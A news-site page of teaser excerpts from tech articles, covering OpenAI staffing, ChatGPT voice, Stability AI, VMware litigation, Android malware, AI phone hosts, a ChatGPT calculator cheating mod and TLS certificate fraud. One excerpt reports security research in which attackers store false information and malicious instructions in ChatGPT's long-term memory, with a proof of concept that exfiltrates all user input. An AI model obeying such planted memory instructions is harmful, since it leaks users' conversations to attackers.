Category:

Editor’s Pick

Enlarge / Mira Murati, Chief Technology Officer of OpenAI, speaks during The Wall Street Journal’s WSJ Tech Live Conference in Laguna Beach, California on October 17, 2023. (credit: PATRICK T. FALLON via Getty Images)

On Wednesday, OpenAI Chief Technical Officer Mira Murati announced she is leaving the company in a surprise resignation shared on the social network X. Murati joined OpenAI in 2018, serving for six-and-a-half years in various leadership roles, most recently as the CTO.

“After much reflection, I have made the difficult decision to leave OpenAI,” she wrote in a letter to the company’s staff. “While I’ll express my gratitude to many individuals in the coming days, I want to start by thanking Sam and Greg for their trust in me to lead the technical organization and for their support throughout the years,” she continued, referring to OpenAI CEO Sam Altman and President Greg Brockman. “There’s never an ideal time to step away from a place one cherishes, yet this moment feels right.”

At OpenAI, Murati was in charge of overseeing the company’s technical strategy and product development, including the launch and improvement of DALL-E, Codex, Sora, and the ChatGPT platform, while also leading research and safety teams. In public appearances, Murati often spoke about ethical considerations in AI development.

Read 10 remaining paragraphs | Comments

0 comment
0 FacebookTwitterPinterestEmail

Enlarge / Putting the “chat” in ChatGPT (credit: Getty Images)

In May, when OpenAI first demonstrated ChatGPT-4o’s coming audio conversation capabilities, I wrote that it felt like we were “on the verge of something… like a sea change in how we think of and work with large language models.” Now that those “Advanced Voice” features are rolling out widely to ChatGPT subscribers, we decided to ask ChatGPT to explain, in its own voice, how this new method of interaction might impact our collective relationship with large language models.

That chat, which you can listen to and read a transcript of below, shouldn’t be treated as an interview with an official OpenAI spokesperson or anything. Still, it serves as a fun way to offer an initial test of ChatGPT’s live conversational chops.

Our first quick chat with the ChatGPT-4o’s new “Advanced Voice” features.
Our first quick chat with the ChatGPT-4o’s new “Advanced Voice” features.

Even in this short introductory “chat,” we were impressed by the natural, dare-we-say human cadence and delivery of ChatGPT’s “savvy and relaxed” Sol voice (which reminds us a bit of ’90s Janeane Garofalo). Between ChatGPT’s ability to give quick responses—offered in in milliseconds rather than seconds—and convincing intonation, it’s incredibly easy to fool yourself into thinking you’re speaking to a conscious being rather than what is, as ChatGPT says here, “still just a computer program processing information, without real emotions or consciousness.”

Read 2 remaining paragraphs | Comments

0 comment
0 FacebookTwitterPinterestEmail

Enlarge (credit: Getty Images)

When security researcher Johann Rehberger recently reported a vulnerability in ChatGPT that allowed attackers to store false information and malicious instructions in a user’s long-term memory settings, OpenAI summarily closed the inquiry, labeling the flaw a safety issue, not, technically speaking, a security concern.

So Rehberger did what all good researchers do: He created a proof-of-concept exploit that used the vulnerability to exfiltrate all user input in perpetuity. OpenAI engineers took notice and issued a partial fix earlier this month.

Strolling down memory lane

The vulnerability abused long-term conversation memory, a feature OpenAI began testing in February and made more broadly available in September. Memory with ChatGPT stores information from previous conversations and uses it as context in all future conversations. That way, the LLM can be aware of details such as a user’s age, gender, philosophical beliefs, and pretty much anything else, so those details don’t have to be inputted during each conversation.

Read 6 remaining paragraphs | Comments

0 comment
0 FacebookTwitterPinterestEmail

Enlarge / Filmmaker James Cameron. (credit: James Cameron / Stability AI)

On Tuesday, Stability AI announced that renowned filmmaker James Cameron—of Terminator and Skynet fame—has joined its board of directors. Stability is best known for its pioneering but highly controversial Stable Diffusion series of AI image-synthesis models, first launched in 2022, which can generate images based on text descriptions.

“I’ve spent my career seeking out emerging technologies that push the very boundaries of what’s possible, all in the service of telling incredible stories,” said Cameron in a statement. “I was at the forefront of CGI over three decades ago, and I’ve stayed on the cutting edge since. Now, the intersection of generative AI and CGI image creation is the next wave.”

Cameron is perhaps best known as the director behind blockbusters like Avatar, Titanic, and Aliens, but in AI circles, he may be most relevant for the co-creation of the character Skynet, a fictional AI system that triggers nuclear Armageddon and dominates humanity in the Terminator media franchise. Similar fears of AI taking over the world have since jumped into reality and recently sparked attempts to regulate existential risk from AI systems through measures like SB-1047 in California.

Read 10 remaining paragraphs | Comments

0 comment
0 FacebookTwitterPinterestEmail

Enlarge (credit: Getty)

Broadcom is accusing AT&T of trying to “rewind the clock and force” Broadcom “to sell support services for perpetual software licenses … that VMware has discontinued from its product line and to which AT&T has no contractual right to purchase.” The statement comes from legal documents Broadcom filed in response to AT&T’s lawsuit against Broadcom for refusing to renew support for its VMware perpetual licenses [PDF].

On August 29, AT&T filed a lawsuit [PDF] against Broadcom, alleging that Broadcom is breaking a contract by refusing to provide a one-year renewal for support for perpetually licensed VMware software. Broadcom famously ended perpetual VMware license sales shortly after closing its acquisition in favor of a subscription model featuring about two bundles of products rather than many SKUs.

AT&T claims its VMware contract (forged before Broadcom’s acquisition closed in November) entitles it to three one-year renewals of perpetual license support, and it’s currently trying to enact the second one. AT&T says it uses VMware products to run 75,000 virtual machines (VMs) across about 8,600 servers. The VMs are for supporting customer services operations and operations management efficiency, per AT&T. AT&T is asking the Supreme Court of the State of New York to stop Broadcom from ending VMware support services for AT&T and “further relief” as deemed necessary.

Read 13 remaining paragraphs | Comments

0 comment
0 FacebookTwitterPinterestEmail

Enlarge (credit: andresr via Getty Images)

On Monday, OpenAI CEO Sam Altman outlined his vision for an AI-driven future of tech progress and global prosperity in a new personal blog post titled “The Intelligence Age.” The essay paints a picture of human advancement accelerated by AI, with Altman suggesting that superintelligent AI could emerge within the next decade.

“It is possible that we will have superintelligence in a few thousand days (!); it may take longer, but I’m confident we’ll get there,” he wrote.

OpenAI’s current goal is to create AGI (artificial general intelligence), which is a term for hypothetical technology that could match human intelligence in performing many tasks without the need for specific training. In contrast, superintelligence surpasses AGI, and it could be seen as a hypothetical level of machine intelligence that can dramatically outperform humans at any intellectual task, perhaps even to an unfathomable degree.

Read 13 remaining paragraphs | Comments

0 comment
0 FacebookTwitterPinterestEmail

Enlarge (credit: Getty Images)

Five years ago, researchers made a grim discovery—a legitimate Android app in the Google Play market that was surreptitiously made malicious by a library the developers used to earn advertising revenue. With that, the app was infected with code that caused 100 million infected devices to connect to attacker-controlled servers and download secret payloads.

Now, history is repeating itself. Researchers from the same Moscow, Russia-based security firm reported Monday that they found two new apps, downloaded from Play 11 million times, that were infected with the same malware family. The researchers, from Kaspersky, believe a malicious software developer kit for integrating advertising capabilities is once again responsible.

Clever tradecraft

Software developer kits, better known as SDKs, are apps that provide developers with frameworks that can greatly speed up the app-creation process by streamlining repetitive tasks. An unverified SDK module incorporated into the apps ostensibly supported the display of ads. Behind the scenes, it provided a host of advanced methods for stealthy communication with malicious servers, where the apps would upload user data and download malicious code that could be executed and updated at any time.

Read 10 remaining paragraphs | Comments

0 comment
0 FacebookTwitterPinterestEmail

Enlarge (credit: Getty Images | Juj Winn)

A pleasant female voice greets me over the phone. “Hi, I’m an assistant named Jasmine for Bodega,” the voice says. “How can I help?”

“Do you have patio seating,” I ask. Jasmine sounds a little sad as she tells me that unfortunately, the San Francisco–based Vietnamese restaurant doesn’t have outdoor seating. But her sadness isn’t the result of her having a bad day. Rather, her tone is a feature, a setting.

Jasmine is a member of a new, growing clan: the AI voice restaurant host. If you recently called up a restaurant in New York City, Miami, Atlanta, or San Francisco, chances are you have spoken to one of Jasmine’s polite, calculated competitors.  

Read 11 remaining paragraphs | Comments

0 comment
0 FacebookTwitterPinterestEmail

Enlarge (credit: ChromaDev)

On Saturday, a YouTube creator called “ChromaLock” published a video detailing how he modified a Texas Instruments TI-84 graphing calculator to connect to the Internet and access OpenAI’s ChatGPT, potentially enabling students to cheat on tests. The video, titled “I Made The Ultimate Cheating Device,” demonstrates a custom hardware modification that allows users of the graphing calculator to type in problems sent to ChatGPT using the keypad and receive live responses on the screen.

ChromaLock began by exploring the calculator’s link port, typically used for transferring educational programs between devices. He then designed a custom circuit board he calls “TI-32” that incorporates a tiny Wi-Fi-enabled microcontroller, the Seed Studio ESP32-C3 (which costs about $5), along with other components to interface with the calculator’s systems.

It’s worth noting that the TI-32 hack isn’t a commercial project. Replicating ChromaLock’s work would involve purchasing a TI-84 calculator, a Seed Studio ESP32-C3 microcontroller, and various electronic components, and fabricating a custom PCB based on ChromaLock’s design, which is available online.

Read 6 remaining paragraphs | Comments

0 comment
0 FacebookTwitterPinterestEmail

Enlarge (credit: Getty Images)

Certificate authorities and browser makers are planning to end the use of WHOIS data verifying domain ownership following a report that demonstrated how threat actors could abuse the process to obtain fraudulently issued TLS certificates.

TLS certificates are the cryptographic credentials that underpin HTTPS connections, a critical component of online communications verifying that a server belongs to a trusted entity and encrypts all traffic passing between it and an end user. These credentials are issued by any one of hundreds of CAs (certificate authorities) to domain owners. The rules for how certificates are issued and the process for verifying the rightful owner of a domain are left to the CA/Browser Forum. One “base requirement rule” allows CAs to send an email to an address listed in the WHOIS record for the domain being applied for. When the receiver clicks an enclosed link, the certificate is automatically approved.

Non-trivial dependencies

Researchers from security firm watchTowr recently demonstrated how threat actors could abuse the rule to obtain fraudulently issued certificates for domains they didn’t own. The security failure resulted from a lack of uniform rules for determining the validity of sites claiming to provide official WHOIS records.

Read 8 remaining paragraphs | Comments

0 comment
0 FacebookTwitterPinterestEmail